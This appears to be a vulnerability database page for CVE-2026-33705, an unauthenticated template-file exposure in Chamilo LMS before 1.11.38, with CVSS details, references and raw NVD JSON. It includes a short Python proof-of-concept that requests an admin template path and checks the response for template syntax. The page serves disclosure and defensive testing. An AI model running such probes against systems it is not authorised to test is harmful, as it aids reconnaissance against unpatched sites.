CVE-2026-33705

Description

Chamilo LMS is a learning management system. Prior to 1.11.38, Twig template files (.tpl) under /main/template/default/ are directly accessible without authentication via HTTP GET requests. These templates expose internal application logic, variable names, AJAX endpoint URLs, and admin panel structure. This vulnerability is fixed in 1.11.38.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:chamilo:chamilo_lms:*:*:*:*:*:*:*:* - VULNERABLE

Chamilo LMS < 1.11.38

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def check_vulnerability(base_url):
    # Example target file path
    target_path = "/main/template/default/admin/layout.tpl"
    full_url = base_url + target_path

    try:
        # Send HTTP GET request without authentication
        response = requests.get(full_url, timeout=10)

        if response.status_code == 200:
            print(f"[+] Potential Vulnerability Found at: {full_url}")
            # Check if response contains typical template syntax
            if "{%" in response.text or "{{" in response.text:
                print("[+] Template syntax detected in response.")
                print("[+] Content snippet:")
                print(response.text[:200])
                return True
        else:
            print(f"[-] Status Code: {response.status_code}")
    except Exception as e:
        print(f"[-] Error: {e}")
    return False

if __name__ == "__main__":
    target = "http://example.com" # Replace with actual target
    check_vulnerability(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33705
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33705
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33705/
[4] VulDB https://vuldb.com/cve/CVE-2026-33705
[5] https://github.com/chamilo/chamilo-lms/commit/4efb5ee8ed849ca147ca1fe7472ef7b98db17bff
[6] https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-5wjg-8x28-px57

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33705", "sourceIdentifier": "[email protected]", "published": "2026-04-10T19:16:23.653", "lastModified": "2026-04-16T18:29:46.540", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Chamilo LMS is a learning management system. Prior to 1.11.38, Twig template files (.tpl) under /main/template/default/ are directly accessible without authentication via HTTP GET requests. These templates expose internal application logic, variable names, AJAX endpoint URLs, and admin panel structure. This vulnerability is fixed in 1.11.38."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-538"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:chamilo:chamilo_lms:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.11.38", "matchCriteriaId": "A4D0C5D2-6FA0-4532-8E3D-4EA111A50621"}]}]}], "references": [{"url": "https://github.com/chamilo/chamilo-lms/commit/4efb5ee8ed849ca147ca1fe7472ef7b98db17bff", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-5wjg-8x28-px57", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}